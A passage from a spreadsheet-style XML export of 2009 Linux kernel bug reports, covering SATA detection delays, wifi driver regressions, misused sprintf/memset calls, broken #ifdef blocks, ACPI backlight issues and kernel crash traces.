nb1a kernel: [677830.924344] [&lt;ffffffffa06905df&gt;] ext4_ioctl+0x4dd/0x5d8 [ext4] Jun 16 09:49:00 nb1a kernel: [677830.924403] [&lt;ffffffff8023f8a3&gt;] finish_task_switch+0x2a/0xc7 Jun 16 09:49:00 nb1a kernel: [677830.924463] [&lt;ffffffff802c869e&gt;] vfs_ioctl+0x21/0x6c Jun 16 09:49:00 nb1a kernel: [677830.924521] [&lt;ffffffff802c8b22&gt;] do_vfs_ioctl+0x439/0x472 Jun 16 09:49:00 nb1a kernel: [677830.924580] [&lt;ffffffff802bdaaf&gt;] vfs_write+0xcd/0x102 Jun 16 09:49:00 nb1a kernel: [677830.924638] [&lt;ffffffff802c8bac&gt;] sys_ioctl+0x51/0x70 Jun 16 09:49:00 nb1a kernel: [677830.924696] [&lt;ffffffff802110aa&gt;] system_call_fastpath+0x16/0x1b Jun 16 09:49:00 nb1a kernel: [677830.924756] ---[ end trace 46ff5ad2da854d82 ]--- P.S.: Please add "debian" on the tree dropdown, exact debian package is: linux-image-2.6.29-2-amd64 version 2.6.29-5</t>
  </si>
  <si>
    <t>SATA: link online but device misclassified</t>
  </si>
  <si>
    <t>2.6.29-gentoo-r5</t>
  </si>
  <si>
    <t>2009-06-16 18:07 UTC</t>
  </si>
  <si>
    <t>Marc Bowes</t>
  </si>
  <si>
    <t>2012-06-08 12:02 UTC</t>
  </si>
  <si>
    <t>Created attachment 21940 [details] dmesg There is a long wait while booting with my new motherboard (Gigabyte EP45-DQ6) as it appears to be unable to detect the presence of drives correctly. It (the motherboard) has 6 SATA slots, and I have 4 drives plugged in. I have attached the full dmesg output, but the area of interest is: ata1: link is slow to respond, please be patient (ready=0) ata1: softreset failed (device not ready) ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata1: link online but device misclassified, retrying ata1: link is slow to respond, please be patient (ready=0) ata1: softreset failed (device not ready) ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata1: link online but device misclassified, retrying ata1: link is slow to respond, please be patient (ready=0) ata1: softreset failed (device not ready) ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata1: link online but device misclassified, retrying ata1: limiting SATA link speed to 1.5 Gbps ata1: softreset failed (device not ready) ata1: SATA link up to 1.5 Gbps (SStatus 113 SControl 310) ata1: link online but device misclassified, device detection might fail ata2: link is slow to respond, please be patient (ready=0) ata2: softreset failed (device not ready) ... (as with ata1) Enabling AHCI in the BIOS makes difference (except for numbering). The 4 drives appear to be working correctly (speeds are good, and I haven't noticed any hiccups). From the linux-ide mailing list, it has been suggested that the issue is that the kernel is unable to detect that there are no drives on the other end of the 2 unused ports. From lspci, the following is relevant (I will attach the full output in a comment): 0a:00.0 SATA controller: JMicron Technologies, Inc. JMicron 20360/20363 AHCI Controller (rev 02)</t>
  </si>
  <si>
    <t>Bad performance of wifi using zd1211rw driver</t>
  </si>
  <si>
    <t>2.6.29 and 2.6.30</t>
  </si>
  <si>
    <t>2009-06-18 12:46 UTC</t>
  </si>
  <si>
    <t>Martin Dratva</t>
  </si>
  <si>
    <t>2010-11-23 16:40 UTC</t>
  </si>
  <si>
    <t>I have one machine, that has Arch Linux and Ubuntu installed. I have Zyxel G-202 USB Wifi dongle, that uses zd1211rw driver included in kernel. In Arch, when I try to copy files from this machine to my other PC (wired connection) I get upload 25-100 KB/s. In Ubuntu I get 1.5-2 MB/s. When just browsing, everything is fine on Arch as well, but when I start torrents or anything what really uses a lot of bandwidth, my pings to router go up to 3000 ms, sometimes even 40 000 ms with occasional disconnects. This does not happen on Ubuntu. Torrents work fine there. Ubuntu has 2.6.28 kernel, my fully updated Arch is on 2.6.29. I checked logs on both systems, everything looks fine, no errors and zd1211rw loading section in dmesg is the same : Ubuntu: [ 25.184444] usb 1-3: firmware: requesting zd1211/zd1211b_ub [ 25.287503] usb 1-3: firmware: requesting zd1211/zd1211b_uphr [ 25.362855] zd1211rw 1-3:1.0: firmware version 4725 [ 25.404846] zd1211rw 1-3:1.0: zd1211b chip 0586:3410 v4810 high 00-19-cb AL2230_RF pa0 g--NS Arch: usb 1-3: firmware: requesting zd1211/zd1211b_ub usb 1-3: firmware: requesting zd1211/zd1211b_uphr zd1211rw 1-3:1.0: firmware version 4725 zd1211rw 1-3:1.0: zd1211b chip 0586:3410 v4810 high 00-19-cb AL2230_RF pa0 g--NS I tried to switch my Arch installation to 2.6.30 kernel, but the problem persisted. Then I downgraded kernel to 2.6.28 and this works just fine, so the problem exists in 2.6.29 and 2.6.30 kernel. If you need any additional info, I'll be happy to provide.</t>
  </si>
  <si>
    <t>(Patch queued) arch/ia64/sn/kernel/io_common.c:438: bad call to sprintf</t>
  </si>
  <si>
    <t>2009-06-18 20:52 UTC</t>
  </si>
  <si>
    <t>2009-07-08 14:35 UTC</t>
  </si>
  <si>
    <t>The offending line of code is sprintf(address, "%s^%d", address, geo_slot(geoid)); AFAIK, it is a bad idea to have the source and destination address the same. Suggest code rework.</t>
  </si>
  <si>
    <t>Broken backlight control on Acer Aspire 8930G due to buggy DSDT/ACPI Video</t>
  </si>
  <si>
    <t>2009-06-19 04:58 UTC</t>
  </si>
  <si>
    <t>Hector Martin</t>
  </si>
  <si>
    <t>2010-01-23 19:08 UTC</t>
  </si>
  <si>
    <t>Created attachment 22005 [details] Disassembled DSDT Backlight controls on this laptop are broken due to a combination of factors. Apparently, the DSDT supports two methods to set the backlight: - old WMI / proprietary method. This is supported by acer_wmi. - ACPI Video interface When the DSDT detects Windows Vista (which Linux seems to pretend to be), it disables the WMI method and also disables direct control using the hardware keys, instead expecting software to react to those keypresses and control it using the ACPI Video device. When I do a very ugly EC hack to turn off Vista mode, acer_wmi works fine to set and query the brightness and also the hardware keys work directly, even without acer_wmi. Presumably this will also be the case if Linux doesn't identify itself as Vista to ACPI. The ACPI Video Interface is broken. There are three devices supported: OVGA, PEGP.EVGA, and PEGP.NVGA. As far as I can tell, OVGA is supposed to be an integrated graphics controller that doesn't exist. EVGA and NVGA are very similar and I don't know which one corresponds to my laptop or how the driver is supposed to tell between them, but clearly one of them is the correct one and corresponds to the modular MXM card on the laptop. OVGA would work except that it corresponds to a nonexistent PCI device, so acpi_get_physical_pci_device kills it. Hacking this out makes things work (the brightness setting is via the EC anyway, and works the same for all three devices), but that doesn't sound like a good idea. EVGA and NVGA fail to register as video devices because they lack the _DOS method that ACPI specifies as required for backlight functionality. They do have _DOD, which isn't enough for display output switching support, but at least identifies them as video devices. They fail the acpi_is_video_device because that only checks for backlight support if one of the other three features is fully present. They also fail acpi_video_bus_check because that again wants one of the three features. At this point I'm unsure of what the best way to fix this is. My guess would be to make acpi_is_video_device check for brightness controls even if only _DOD is present, and also make acpi_video_bus_check consider just _DOD good enough to pass a device. Then the other issue left would be the duplicated device (the backlight control is really messed up when it tries to do the same thing to two different devices). Applying those two hacks and and manually unbinding one of the devices from the driver via sysfs makes things work for me.</t>
  </si>
  <si>
    <t>/var/log/message contains non-printable character</t>
  </si>
  <si>
    <t>2.6.29.5</t>
  </si>
  <si>
    <t>2009-06-19 11:55 UTC</t>
  </si>
  <si>
    <t>2009-11-25 05:44 UTC</t>
  </si>
  <si>
    <t>Created attachment 22007 [details] log line The attached file is a line which I have within my /var/log/messages of my ThinkPad T400. Unfortunateley that's why less won't show that file as text :-(</t>
  </si>
  <si>
    <t>ath9k doesn't work with newer kernels</t>
  </si>
  <si>
    <t>2009-06-19 12:04 UTC</t>
  </si>
  <si>
    <t>2009-12-29 21:28 UTC</t>
  </si>
  <si>
    <t>Upgrading from 2.6.29 to 2.6.30 the wireless stop working. some infos: # wpa_supplicant -i wlan0 -D wext -c /etc/wpa_supplicant/wpa_supplicant.conf CTRL-EVENT-SCAN-RESULTS Trying to associate with 00:18:84:81:00:fd (SSID='OpenWrt' freq=2452 MHz) Association request to the driver failed Associated with 00:18:84:81:00:fd CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys ioctl[SIOCSIWENCODEEXT]: No such file or directory ioctl[SIOCSIWSCAN]: Device or resource busy Failed to initiate AP scan. Authentication with 00:00:00:00:00:00 timed out. CTRL-EVENT-SCAN-RESULTS Trying to associate with 00:18:84:81:00:fd (SSID='OpenWrt' freq=2452 MHz) Association request to the driver failed Associated with 00:18:84:81:00:fd CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys ioctl[SIOCSIWENCODEEXT]: No such file or directory ioctl[SIOCSIWSCAN]: Device or resource busy Failed to initiate AP scan. Authentication with 00:00:00:00:00:00 timed out. # dmesg cfg80211: Using static regulatory domain info cfg80211: Regulatory domain: US (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) (2402000 KHz - 2472000 KHz @ 40000 KHz), (600 mBi, 2700 mBm) (5170000 KHz - 5190000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) (5190000 KHz - 5210000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) (5210000 KHz - 5230000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) (5230000 KHz - 5330000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) (5735000 KHz - 5835000 KHz @ 40000 KHz), (600 mBi, 3000 mBm) cfg80211: Calling CRDA for country: US ath9k 0000:03:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 ath9k 0000:03:00.0: setting latency timer to 64 phy0: Selected rate control algorithm 'ath9k_rate_control' cfg80211: Calling CRDA for country: AT Registered led device: ath9k-phy0::radio Registered led device: ath9k-phy0::assoc Registered led device: ath9k-phy0::tx Registered led device: ath9k-phy0::rx phy0: Atheros AR5418 MAC/BB Rev:2 AR5133 RF Rev:81: mem=0xffffc200042c0000, irq=17 ADDRCONF(NETDEV_UP): wlan0: link is not ready wlan0: authenticate with AP 00:18:84:81:00:fd wlan0: authenticated wlan0: associate with AP 00:18:84:81:00:fd wlan0: RX AssocResp from 00:18:84:81:00:fd (capab=0x431 status=0 aid=3) wlan0: associated ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready wlan0: disassociating by local choice (reason=3) wlan0: no IPv6 routers present wlan0: authenticate with AP 00:18:84:81:00:fd wlan0: authenticated wlan0: associate with AP 00:18:84:81:00:fd wlan0: RX AssocResp from 00:18:84:81:00:fd (capab=0x431 status=0 aid=3) wlan0: associated wlan0: disassociating by local choice (reason=3) wlan0: authenticate with AP 00:18:84:81:00:fd wlan0: authenticated wlan0: associate with AP 00:18:84:81:00:fd wlan0: RX AssocResp from 00:18:84:81:00:fd (capab=0x431 status=0 aid=3) wlan0: associated wlan0: disassociating by local choice (reason=3)</t>
  </si>
  <si>
    <t>iwlagn breaks after a few hours and causes other processes to block</t>
  </si>
  <si>
    <t>2009-06-19 21:45 UTC</t>
  </si>
  <si>
    <t>2009-07-06 23:52 UTC</t>
  </si>
  <si>
    <t>Created attachment 22014 [details] dmesg section with the bug Hardware: Lenovo Thinkpad x200s with a Intel Corporation Wireless WiFi Link 5300 kernel: 2.6.30 (no problems with 2.6.29) Problem: After several hours of working with wireless lan I get the message attached. wlan stops working. "ifconfig down" or "modprobe -r" hangs and cannot be killed. Reboot is not possible. And some other processes start to hang too. Others continue to work just fine. I could not detect a pattern here. This happens with both iwlwifi-5000-1.ucode and iwlwifi-5000-2.ucode The problems takes too long for a random git-bisect but I could test specific versions or a patch.</t>
  </si>
  <si>
    <t>drivers/serial/bfin_sport_uart.c:235: bad call to memset</t>
  </si>
  <si>
    <t>2009-06-20 13:27 UTC</t>
  </si>
  <si>
    <t>2009-07-08 14:36 UTC</t>
  </si>
  <si>
    <t>memset(buffer, 20, '\0'); Possible newbie coding error in that the 2nd &amp; 3rd parameter look the wrong way around to me. Also, the coding police have noticed a lot of mentions of the fixed constant "20" in the same routine. Possible improve style by replacing by a sizeof expression or other symbolic constant ?</t>
  </si>
  <si>
    <t>Root partition is not found</t>
  </si>
  <si>
    <t>2.6.30-git16</t>
  </si>
  <si>
    <t>2009-06-21 08:42 UTC</t>
  </si>
  <si>
    <t>2009-06-30 22:42 UTC</t>
  </si>
  <si>
    <t>With the current git tree (2.6.30-git16), the root partition is not found. I am using LVM2 and the root partition is one of the logical volumes. After a git bisect run, it appears that the first bad commit is the following: commit 0c87197142427063e096f11603543ca874045952 Author: Ingo Molnar &lt;mingo@elte.hu&gt; Date: Mon Jun 15 11:35:01 2009 +0200 perf_counter, x86: Improve interactions with fast-gup</t>
  </si>
  <si>
    <t>wrong #endif in arch/mips/mipssim/sim_time.c</t>
  </si>
  <si>
    <t>latest in git: c277331d5fbaae5772ed19862feefa91f4e477d3</t>
  </si>
  <si>
    <t>2009-06-21 20:02 UTC</t>
  </si>
  <si>
    <t>dvice_null</t>
  </si>
  <si>
    <t>2012-06-08 15:37 UTC</t>
  </si>
  <si>
    <t>In file arch/mips/mipssim/sim_time.c There is this function: unsigned __cpuinit get_c0_compare_int(void) { #ifdef MSC01E_INT_BASE if (cpu_has_veic) { set_vi_handler(MSC01E_INT_CPUCTR, mips_timer_dispatch); mips_cpu_timer_irq = MSC01E_INT_BASE + MSC01E_INT_CPUCTR; } else { #endif if (cpu_has_vint) set_vi_handler(cp0_compare_irq, mips_timer_dispatch); mips_cpu_timer_irq = MIPS_CPU_IRQ_BASE + cp0_compare_irq; } return mips_cpu_timer_irq; } If MSC01E_INT_BASE is not defined, the code will be: unsigned __cpuinit get_c0_compare_int(void) { if (cpu_has_vint) set_vi_handler(cp0_compare_irq, mips_timer_dispatch); mips_cpu_timer_irq = MIPS_CPU_IRQ_BASE + cp0_compare_irq; } return mips_cpu_timer_irq; } As you can see, right before the return, there is }-character without {-character (as it was inside the #ifdef). This can probably be fixed by moving the last {-character before #endif after the #endif. This bug was found using Cppcheck: http://cppcheck.wiki.sourceforge.net/</t>
  </si>
  <si>
    <t>arch/mips/sibyte/common/cfe_console.c: Incorrect use of #ifdefs</t>
  </si>
  <si>
    <t>Latest git: c277331d5fbaae5772ed19862feefa91f4e477d3</t>
  </si>
  <si>
    <t>2009-06-21 20:39 UTC</t>
  </si>
  <si>
    <t>2012-06-08 15:38 UTC</t>
  </si>
  <si>
    <t>In file arch/mips/sibyte/common/cfe_console.c There is function: static int cfe_console_setup(struct console *cons, char *str) { char consdev[32]; /* XXXKW think about interaction with 'console=' cmdline arg */ /* If none of the console options are configured, the build will break. */ if (cfe_getenv("BOOT_CONSOLE", consdev, 32) &gt;= 0) { #ifdef CONFIG_SERIAL_SB1250_DUART if (!strcmp(consdev, "uart0")) { setleds("u0cn"); } else if (!strcmp(consdev, "uart1")) { setleds("u1cn"); #endif #ifdef CONFIG_VGA_CONSOLE } else if (!strcmp(consdev, "pcconsole0")) { setleds("pccn"); #endif } else return -ENODEV; } return 0; } If CONFIG_SERIAL_SB1250_DUART is not defined, the code will be: static int cfe_console_setup(struct console *cons, char *str) { char consdev[32]; /* XXXKW think about interaction with 'console=' cmdline arg */ /* If none of the console options are configured, the build will break. */ if (cfe_getenv("BOOT_CONSOLE", consdev, 32) &gt;= 0) { #ifdef CONFIG_VGA_CONSOLE } else if (!strcmp(consdev, "pcconsole0")) { setleds("pccn"); #endif } else return -ENODEV; } return 0; } As you can see, it won't even compile, because the "return 0; }" is left outside the function. This bug was found using Cppcheck: http://cppcheck.wiki.sourceforge.net/</t>
  </si>
  <si>
    <t>thinkpad-acpi: please add a log of initial states of rfkill switches</t>
  </si>
  <si>
    <t>2009-06-22 11:14 UTC</t>
  </si>
  <si>
    <t>Josip Rodin</t>
  </si>
  <si>
    <t>2010-01-24 13:09 UTC</t>
  </si>
  <si>
    <t>On Wed, Jun 17, 2009 at 10:42:05PM -0300, Henrique de Moraes Holschuh wrote: &gt; &gt; So it looks like the remaining problem is that something somewhere seems &gt; &gt; to have set that option in a way that disabled the hardware, but nothing &gt; &gt; tells the user that there is a problem. Can this be fixed? &gt; &gt; Well, if you guys would like that, I can certainly log to syslog the initial &gt; state of the rfkill switches. Which priority do you want? INFO? NOTICE? I think that it would be good to log it, yes. I'd say it's for NOTICE because it's significant, and not just in my case - even the positive result is significant because it may cause more battery drain on laptops, so many users could well care. That would be primarily: /sys/devices/platform/thinkpad_acpi/wwan_enable /sys/devices/platform/thinkpad_acpi/bluetooth_enable &gt; But please _do_ open a bug about it on bugzilla.kernel.org, just in case I &gt; have to send the fix after -rc1. Here goes, hope I filed it under the right category. I tried Cc:ing ibm-acpi@hmh.eng.br just in case, but the Bugzilla wouldn't let me. Please forward as appropriate.</t>
  </si>
  <si>
    <t>Hard crash connecting via Huawei E169 + umtsmon</t>
  </si>
  <si>
    <t>2.6.31-0.17.rc0.git15.fc12.i586</t>
  </si>
  <si>
    <t>2009-06-22 13:58 UTC</t>
  </si>
  <si>
    <t>Clemens Eisserer</t>
  </si>
  <si>
    <t>2009-06-29 18:42 UTC</t>
  </si>
  <si>
    <t>When connect my Huawei E169 using umtsmon, I always get the following hard crash: Jun 22 15:48:22 localhost kernel: Pid: 4807, comm: umtsmon Not tainted (2.6.31-0.17.rc0.git15.fc12.i586 #1) Tecra A8 Jun 22 15:48:22 localhost kernel: EIP: 0060:[&lt;c045b298&gt;] EFLAGS: 00010046 CPU: 1 Jun 22 15:48:22 localhost kernel: EIP is at finish_wait+0x45/0x6e Jun 22 15:48:22 localhost kernel: EAX: 00000000 EBX: f53dd0f8 ECX: 00000000 EDX: 00000246 Jun 22 15:48:22 localhost kernel: ESI: f47b5dcc EDI: f47b5dd8 EBP: f47b5da0 ESP: f47b5d90 Jun 22 15:48:22 localhost kernel: DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jun 22 15:48:22 localhost kernel: Process umtsmon (pid: 4807, ti=f47b4000 task=f1d62b80 task.ti=f47b4000) Jun 22 15:48:22 localhost kernel: Stack: Jun 22 15:48:22 localhost kernel: e9dbb5ab f53dd0c4 fffffe00 00000001 f47b5df0 c0678810 00000246 f53dd0f8 Jun 22 15:48:22 localhost kernel: &lt;0&gt; f53dd0cc f1d8fe00 f53dd1d8 f53dd200 f47b5dcc c046d86c e9dbb5ab 00000000 Jun 22 15:48:22 localhost kernel: &lt;0&gt; f1d62b80 c043e5ac 00000000 00000000 e9dbb5ab fffffe00 f63252d0 f53dd0c0 Jun 22 15:48:22 localhost kernel: Call Trace: Jun 22 15:48:22 localhost kernel: [&lt;c0678810&gt;] ? tty_port_block_til_ready+0x1d0/0x21f Jun 22 15:48:22 localhost kernel: [&lt;c046d86c&gt;] ? trace_hardirqs_on+0x19/0x2c Jun 22 15:48:22 localhost kernel: [&lt;c043e5ac&gt;] ? default_wake_function+0x0/0x35 Jun 22 15:48:22 localhost kernel: [&lt;f8e4a47e&gt;] ? serial_open+0x176/0x1ec [usbserial] Jun 22 15:48:22 localhost kernel: [&lt;c0673025&gt;] ? tty_open+0x292/0x39d Jun 22 15:48:22 localhost kernel: [&lt;c04f64f4&gt;] ? chrdev_open+0x117/0x145 Jun 22 15:48:22 localhost kernel: [&lt;c04f132c&gt;] ? __dentry_open+0x17f/0x2ad Jun 22 15:48:22 localhost kernel: [&lt;c04f63dd&gt;] ? chrdev_open+0x0/0x145 Jun 22 15:48:22 localhost kernel: [&lt;c04f1530&gt;] ? nameidata_to_filp+0x41/0x67 Jun 22 15:48:22 localhost kernel: [&lt;c04fe13d&gt;] ? do_filp_open+0x3f2/0x704 Jun 22 15:48:22 localhost kernel: [&lt;c05081e2&gt;] ? alloc_fd+0x38/0xef Jun 22 15:48:22 localhost kernel: [&lt;c05081e2&gt;] ? alloc_fd+0x38/0xef Jun 22 15:48:22 localhost kernel: [&lt;c05081e2&gt;] ? alloc_fd+0x38/0xef Jun 22 15:48:22 localhost kernel: [&lt;c08122e1&gt;] ? _spin_unlock+0x30/0x45 Jun 22 15:48:22 localhost kernel: [&lt;c050827b&gt;] ? alloc_fd+0xd1/0xef Jun 22 15:48:22 localhost kernel: [&lt;c04f1031&gt;] ? do_sys_open+0x5c/0x109 Jun 22 15:48:22 localhost kernel: [&lt;c04f115b&gt;] ? sys_open+0x31/0x4a Jun 22 15:48:22 localhost kernel: [&lt;c0403a5c&gt;] ? syscall_call+0x7/0xb Jun 22 15:48:22 localhost kernel: Code: f0 31 c0 8d 7a 0c 64 a1 00 10 ad c0 c7 00 00 00 00 00 39 7a 0c 75 05 3b 7a 10 74 21 89 d8 e8 3a 73 3b 00 8b 4e 10 89 c2 8b 46 0c &lt;89&gt; 48 04 89 01 89 d8 89 7e 0c 89 7e 10 e8 9a 6f 3b 00 8b 45 f0 Jun 22 15:48:22 localhost kernel: EIP: [&lt;c045b298&gt;] finish_wait+0x45/0x6e SS:ESP 0068:f47b5d90 Jun 22 15:48:22 localhost kernel: CR2: 0000000000000004 Jun 22 15:48:22 localhost kernel: ---[ end trace 7b7ea1124776698e ]---</t>
  </si>
  <si>
    <t>the kernel oops when registering the ACPI proc I/F for the processors that use the same processor bus id</t>
  </si>
  <si>
    <t>2.6.29 &amp; 2.6.30</t>
  </si>
  <si>
    <t>2009-06-24 03:21 UTC</t>
  </si>
  <si>
    <t>2009-06-25 16:03 UTC</t>
  </si>
  <si>
    <t>Created attachment 22073 [details] the dmesg log on the 2.6.30-rc4 On some boxes several processors use the same processor bus id.But they are located in different scope. For example: \_SB.SCK0.CPU0 \_SB.SCK1.CPU0 As they use the same bus id, OS will complain the OOPS when registering the acpi proc I/F for the processors that use the same bus id.</t>
  </si>
  <si>
    <t>GRO:__napi_complete call from net_rx_action crash</t>
  </si>
  <si>
    <t>2009-06-25 06:55 UTC</t>
  </si>
  <si>
    <t>amit jain</t>
  </si>
  <si>
    <t>2012-06-12 09:54 UTC</t>
  </si>
  <si>
    <t>In net_rx_action, there is check if napi_disable_pending then call __napi_complete. In __napi_complete, there is BUG_ON(n-&gt;gro_list); Which has hit in below bug dump. Why __napi_complete is called from net_rx_action instead of napi_complete. napi_complete flushes the gro list. Below code excerpt from net_rx_action http://lxr.linux.no/linux+v2.6.30/net/core/dev.c#L2736 if (unlikely(work == weight)) { 2791 if (unlikely(napi_disable_pending(n))) 2792 __napi_complete(n); 2793 else 2794 list_move_tail(&amp;n-&gt;poll_list, list); 2795 } ------------[ cut here ]------------ kernel BUG at net/core/dev.c:2672! invalid opcode: 0000 [#1] SMP last sysfs file: /sys/devices/system/cpu/cpu3/cache/index2/shared_cpu_map CPU 2 Modules linked in: netxen_nic nfs lockd nfs_acl auth_rpcgss ipv6 deflate zlib_deflate ctr twofish twofish_common serpent blowfish des_generic cbc aes_x86_64 aes_generic xcbc sha256_generic md5 crypto_null af_key autofs4 sunrpc iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi dm_mirror dm_region_hash dm_log dm_multipath dm_mod video output sbs sbshc pci_slot battery acpi_memhotplug ac parport ipmi_devintf ide_cd_mod rtc_cmos bnx2 cdrom serio_raw ipmi_si rtc_core button ipmi_msghandler iTCO_wdt rtc_lib shpchp hpilo hpwdt i5000_edac pcspkr edac_core ata_piix libata sd_mod scsi_mod cciss ext3 jbd uhci_hcd ohci_hcd ehci_hcd [last unloaded: microcode] Pid: 0, comm: swapper Tainted: G W 2.6.30 #1 ProLiant DL380 G5 RIP: 0010:[&lt;ffffffff8043b128&gt;] [&lt;ffffffff8043b128&gt;] __napi_complete+0x15/0x25 RSP: 0018:ffff880028139eb0 EFLAGS: 00010086 RAX: ffff88023d4056b8 RBX: ffff88023d4056a8 RCX: 0000000002202318 RDX: 00000000001b0000 RSI: ffff880028139d98 RDI: ffff88023d4056a8 RBP: 0000000000000080 R08: 0000000002200000 R09: 000006de15931680 R10: ffffc20011a32318 R11: 0000000000000005 R12: 0000000000000000 R13: ffff8800281440e0 R14: 0000000000000080 R15: 000000000000012c FS: 0000000000000000(0000) GS:ffff880028136000(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 00000000008cb530 CR3: 000000023d9ab000 CR4: 00000000000006e0 Jun 23 23:41:27 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process swapper (pid: 0, threadinfo ffff88023ed28000, task ffff88023ed27570) Stack: ffff88023d4056a8 ffffffff8043ec9f 0000000000000001dut4146 last mes 000000010004f429 ffff88023d4056b8sage repeated 6 0000000000000046 0000000000000001 0000000000000100times Jun 23 23 ffffffff8069a098 0000000000000018 000000000000000a:41:32 dut4146 k ffffffff8023eba6 ernel: BUG: scheCall Trace: duling while ato &lt;IRQ&gt; &lt;0&gt;mic: swapper/0/0 [&lt;ffffffff8043ec9f&gt;] ? net_rx_action+0xf0/0x162 [&lt;ffffffff8023eba6&gt;] ? __do_softirq+0xa3/0x163 [&lt;ffffffff8020ca7c&gt;] ? call_softirq+0x1c/0x28 x10000100 Jun 2 [&lt;ffffffff8020dc1a&gt;] ? do_softirq+0x2c/0x68 [&lt;ffffffff8023eac6&gt;] ? irq_exit+0x3f/0x7c [&lt;ffffffff8020d46b&gt;] ? do_IRQ+0xa9/0xbf 3 23:41:32 dut41 [&lt;ffffffff8020c353&gt;] ? ret_from_intr+0x0/0xa &lt;EOI&gt; 46 kernel: Modul&lt;0&gt; [&lt;ffffffff80220e41&gt;] ? hpet_legacy_next_event+0x0/0x7 es linked in: ne [&lt;ffffffff80386e2c&gt;] ? acpi_hw_register_read+0x52/0xe5 [&lt;ffffffff80394b2a&gt;] ? acpi_idle_enter_simple+0x120/0x14e [&lt;ffffffff80394b20&gt;] ? acpi_idle_enter_simple+0x116/0x14e [&lt;ffffffff8039486b&gt;] ? acpi_idle_enter_bm+0xd5/0x274 [&lt;ffffffff8041c020&gt;] ? cpuidle_idle_call+0x7f/0xbb [&lt;ffffffff8020aaa5&gt;] ? cpu_idle+0x4a/0x6d Code: txen_nic nfs loc48 8d kd nfs_acl auth_43 70 48 rpcgss ipv6 defl39 c2 ate zlib_deflate0f ctr twofish two18 0e 75 fish_common serpdf ent blowfish des31 c9 41 _generic cbc aes58 5b _x86_64 aes_gene5d 48 89 ric xcbc sha256_c8 c3 generic md5 cryp53 f6 to_null af_key a47 10 01 utofs4 sunrpc is48 89 fb csi_tcp libiscsi75 04 _tcp libiscsi sc0f 0b eb si_transport_iscfe 48 83 si dm_mirror dm_7f 50 region_hash dm_l00 74 04 og dm_multipath &lt;0f&gt; dm_mod video out0b eb put sbs sbshc pcfe e8 i_slot battery a1f cpi_memhotplug a10 f1 ff c parport ipmi_df0 80 evintf ide_cd_mo63 10 fe d rtc_cmos bnx2 5b c3 cdrom serio_raw 53 48 89 ipmi_si rtc_corefb e8 button ipmi_msgRIP [&lt;ffffffff8043b128&gt;] __napi_complete+0x15/0x25 RSP &lt;ffff880028139eb0&gt; ---[ end trace 9c6b22b26aefd1b1 ]--- handler iTCO_wdtKernel panic - not syncing: Fatal exception in interrupt Pid: 0, comm: swapper Tainted: G D W 2.6.30 #1 Call Trace: &lt;IRQ&gt; [&lt;ffffffff8023a3b5&gt;] ? panic+0x86/0x134 [&lt;ffffffff8020e348&gt;] ? show_registers+0x211/0x21d [&lt;ffffffff8024f5ea&gt;] ? up+0xe/0x36 [&lt;ffffffff8023a9db&gt;] ? release_console_sem+0x174/0x18e [&lt;ffffffff804bdd54&gt;] ? oops_end+0xa0/0xad [&lt;ffffffff8020cf2c&gt;] ? do_invalid_op+0x85/0x8f [&lt;ffffffff8043b128&gt;] ? __napi_complete+0x15/0x25 [&lt;ffffffffa03ebfe2&gt;] ? netxen_nic_hw_write_wx_2M+0x24/0xa8 [netxen_nic] [&lt;ffffffffa03ef866&gt;] ? netxen_process_rcv_ring+0x4eb/0x501 [netxen_nic] rtc_lib shpchp [&lt;ffffffff8020c715&gt;] ? invalid_op+0x15/0x20 [&lt;ffffffff8043b128&gt;] ? __napi_complete+0x15/0x25 [&lt;ffffffff8043ec9f&gt;] ? net_rx_action+0xf0/0x162 [&lt;ffffffff8023eba6&gt;] ? __do_softirq+0xa3/0x163 [&lt;ffffffff8020ca7c&gt;] ? call_softirq+0x1c/0x28 [&lt;ffffffff8020dc1a&gt;] ? do_softirq+0x2c/0x68 [&lt;ffffffff8023eac6&gt;] ? irq_exit+0x3f/0x7c [&lt;ffffffff8020d46b&gt;] ? do_IRQ+0xa9/0xbf [&lt;ffffffff8020c353&gt;] ? ret_from_intr+0x0/0xa &lt;EOI&gt; [&lt;ffffffff80220e41&gt;] ? hpet_legacy_next_event+0x0/0x7 [&lt;ffffffff80386e2c&gt;] ? acpi_hw_register_read+0x52/0xe5 [&lt;ffffffff80394b2a&gt;] ? acpi_idle_enter_simple+0x120/0x14e [&lt;ffffffff80394b20&gt;] ? acpi_idle_enter_simple+0x116/0x14e [&lt;ffffffff8039486b&gt;] ? acpi_idle_enter_bm+0xd5/0x274 [&lt;ffffffff8041c020&gt;] ? cpuidle_idle_call+0x7f/0xbb [&lt;ffffffff8020aaa5&gt;] ? cpu_idle+0x4a/0x6d</t>
  </si>
  <si>
    <t>acpi_enforce_resources broken - conflicting i2c module loaded on some EeePCs</t>
  </si>
  <si>
    <t>Debian 2.6.30-1</t>
  </si>
  <si>
    <t>2009-06-25 08:31 UTC</t>
  </si>
  <si>
    <t>2009-08-21 16:42 UTC</t>
  </si>
  <si>
